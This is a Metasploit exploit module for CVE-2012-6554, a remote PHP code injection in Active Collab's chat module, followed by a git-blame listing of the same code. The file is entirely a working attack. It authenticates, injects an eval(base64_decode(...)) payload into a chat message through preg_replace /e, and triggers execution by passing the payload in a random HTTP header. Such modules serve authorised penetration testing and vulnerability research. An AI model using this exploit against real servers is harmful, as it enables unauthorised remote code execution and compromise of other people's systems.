modules/exploits/multi/http/activecollab_chat.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Active Collab "chat module" Remote PHP Code Injection Exploit',
      'Description'    => %q{
        This module exploits an arbitrary code injection vulnerability in the
        chat module that is part of Active Collab versions 2.3.8 and earlier by
        abusing a preg_replace() using the /e modifier and its replacement
        string using double quotes. The vulnerable function can be found in
        activecollab/application/modules/chat/functions/html_to_text.php.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me <steventhomasseeley[at]gmail.com>',  # vuln discovery & msf module
        ],
      'References'     =>
        [
          ['CVE', '2012-6554'],
          ['OSVDB', '81966'],
          ['URL', 'http://www.activecollab.com/downloads/category/4/package/62/releases'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Keys'        => ['php'],
          'Space'       => 4000,
          'DisableNops' => true,
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Automatic',{}]],
      'DisclosureDate' => '2012-05-30',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URI',[true, "The path to the ActiveCollab installation", "/"]),
        OptString.new('USER',[true, "The username (e-mail) to authenticate with"]),
        OptString.new('PASS',[true, "The password to authenticate with"])
      ])
  end

  def check

    login_path = "public/index.php?path_info=login&re_route=homepage"
    uri = normalize_uri(datastore['URI'])
    uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? login_path : "/#{login_path}"

    cms = send_request_raw({'uri' => uri}, 25)

    uri = normalize_uri(datastore['URI'])
    uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/assets/modules/chat/' : '/public/assets/modules/chat/'

    chat = send_request_raw({'uri' => uri}, 25)

    # cant detect the version here
    if (cms and cms.body =~ /powered by activeCollab/)
      # detect the chat module
      if (chat and chat.code == 200)
        return Exploit::CheckCode::Detected
      end
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    user = datastore['USER']
    pass = datastore['PASS']
    p = Rex::Text.encode_base64(payload.encoded)
    header = rand_text_alpha_upper(3)
    login_uri = normalize_uri(datastore['URI'])
    login_uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php?path_info=login' : '/public/index.php?path_info=login'

    # login
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => login_uri,
      'vars_post' =>
        {
          'login[email]'      => user,
          'login[password]'   => pass,
          'submitted'         => "submitted",
        }
      }, 40)

    # response handling
    if res and res.code == 302
      if res.get_cookies =~ /ac_ActiveCollab_sid_[a-zA-Z0-9]+=(.*); expires=/
        acsession = $1
      end
    elsif res and res.body =~ /Failed to log you in/
      print_error("#{rhost}:#{rport} Could not login to the target application as #{user}:#{pass}")
    elsif res and res.code != 200 or res.code != 302
      print_error("#{rhost}:#{rport} Server returned a failed status code: (#{res.code})")
    end

    # injection
    iuri = normalize_uri(datastore['URI'])
    iuri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'index.php' : '/index.php'
    iuri << "?path_info=chat/add_message&async=1"
    phpkode = "{\${eval(base64_decode(\$_SERVER[HTTP_#{header}]))}}"
    injection = "<th>\");#{phpkode}</th>"
    cookies = "ac_ActiveCollab_sid_eaM4h3LTIZ=#{acsession}"
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => iuri,
      'headers' =>
        {
          'cookie'  => cookies
        },
      'vars_post' =>
        {
          'submitted'                  => "submitted",
          'message[message_text]'      => injection,
          'message[chat_id]'           => "1",
          'message[posted_to_user_id]' => "all"
        }
    }, 25)

    euri = normalize_uri(datastore['URI'])
    euri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php' : '/public/index.php'
    euri << "?path_info=/chat/history/1"

    # execution
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => euri,
      'headers' =>
        {
          header    => p,
          'cookie'  => cookies
        }
    })
  end
end
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`include Msf::Exploit::Remote::HttpClient`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`def initialize(info={})`
			`super(update_info(info,`
Fix first chunk of msftidy "bad char" errors 2014-03-11 11:10:39 -05:00			`'Name' => 'Active Collab "chat module" Remote PHP Code Injection Exploit',`
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`'Description' => %q{`
Fix first chunk of msftidy "bad char" errors 2014-03-11 11:10:39 -05:00			`This module exploits an arbitrary code injection vulnerability in the`
			`chat module that is part of Active Collab versions 2.3.8 and earlier by`
			`abusing a preg_replace() using the /e modifier and its replacement`
			`string using double quotes. The vulnerable function can be found in`
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`activecollab/application/modules/chat/functions/html_to_text.php.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'mr_me <steventhomasseeley[at]gmail.com>', # vuln discovery & msf module`
			`],`
			`'References' =>`
			`[`
CVE and OSVDB update 2013-06-25 02:06:20 -05:00			`['CVE', '2012-6554'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '81966'],`
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`['URL', 'http://www.activecollab.com/downloads/category/4/package/62/releases'],`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Keys' => ['php'],`
			`'Space' => 4000,`
			`'DisableNops' => true,`
			`},`
			`'Platform' => ['php'],`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [['Automatic',{}]],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2012-05-30',`
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`register_options(`
			`[`
			`OptString.new('URI',[true, "The path to the ActiveCollab installation", "/"]),`
			`OptString.new('USER',[true, "The username (e-mail) to authenticate with"]),`
			`OptString.new('PASS',[true, "The password to authenticate with"])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`def check`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`login_path = "public/index.php?path_info=login&re_route=homepage"`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`uri = normalize_uri(datastore['URI'])`
			`uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? login_path : "/#{login_path}"`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`cms = send_request_raw({'uri' => uri}, 25)`
Retab modules 2013-08-30 16:28:54 -05:00
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`uri = normalize_uri(datastore['URI'])`
			`uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/assets/modules/chat/' : '/public/assets/modules/chat/'`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`chat = send_request_raw({'uri' => uri}, 25)`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`# cant detect the version here`
			`if (cms and cms.body =~ /powered by activeCollab/)`
			`# detect the chat module`
			`if (chat and chat.code == 200)`
Update some checks 2014-01-24 12:08:23 -06:00			`return Exploit::CheckCode::Detected`
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`end`
			`end`
			`return Exploit::CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`def exploit`
			`user = datastore['USER']`
			`pass = datastore['PASS']`
			`p = Rex::Text.encode_base64(payload.encoded)`
			`header = rand_text_alpha_upper(3)`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`login_uri = normalize_uri(datastore['URI'])`
			`login_uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php?path_info=login' : '/public/index.php?path_info=login'`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`# login`
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => login_uri,`
			`'vars_post' =>`
			`{`
			`'login[email]' => user,`
			`'login[password]' => pass,`
			`'submitted' => "submitted",`
			`}`
			`}, 40)`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`# response handling`
Fix the rest of possible nil res bugs I've found 2012-06-04 14:56:27 -05:00			`if res and res.code == 302`
Resolved some more Set-Cookie warnings 2014-05-13 22:56:12 +02:00			`if res.get_cookies =~ /ac_ActiveCollab_sid_[a-zA-Z0-9]+=(.*); expires=/`
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`acsession = $1`
			`end`
Fix the rest of possible nil res bugs I've found 2012-06-04 14:56:27 -05:00			`elsif res and res.body =~ /Failed to log you in/`
Fixed print_status to include rhost:rport 2012-05-21 11:11:34 -05:00			`print_error("#{rhost}:#{rport} Could not login to the target application as #{user}:#{pass}")`
Fix the rest of possible nil res bugs I've found 2012-06-04 14:56:27 -05:00			`elsif res and res.code != 200 or res.code != 302`
Fixed print_status to include rhost:rport 2012-05-21 11:11:34 -05:00			`print_error("#{rhost}:#{rport} Server returned a failed status code: (#{res.code})")`
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`# injection`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`iuri = normalize_uri(datastore['URI'])`
			`iuri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'index.php' : '/index.php'`
Msftidy fixes. 2012-05-21 10:59:52 -05:00			`iuri << "?path_info=chat/add_message&async=1"`
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`phpkode = "{\${eval(base64_decode(\$_SERVER[HTTP_#{header}]))}}"`
			`injection = "<th>\");#{phpkode}</th>"`
			`cookies = "ac_ActiveCollab_sid_eaM4h3LTIZ=#{acsession}"`
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => iuri,`
			`'headers' =>`
			`{`
			`'cookie' => cookies`
			`},`
			`'vars_post' =>`
			`{`
			`'submitted' => "submitted",`
			`'message[message_text]' => injection,`
			`'message[chat_id]' => "1",`
			`'message[posted_to_user_id]' => "all"`
			`}`
			`}, 25)`
Retab modules 2013-08-30 16:28:54 -05:00
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`euri = normalize_uri(datastore['URI'])`
			`euri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php' : '/public/index.php'`
Msftidy fixes. 2012-05-21 10:59:52 -05:00			`euri << "?path_info=/chat/history/1"`
Retab modules 2013-08-30 16:28:54 -05:00
Add Active Collab chat module PHP injection exploit, by mr_me 2012-05-19 02:06:30 -05:00			`# execution`
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => euri,`
			`'headers' =>`
			`{`
			`header => p,`
			`'cookie' => cookies`
			`}`
			`})`
			`end`
			`end`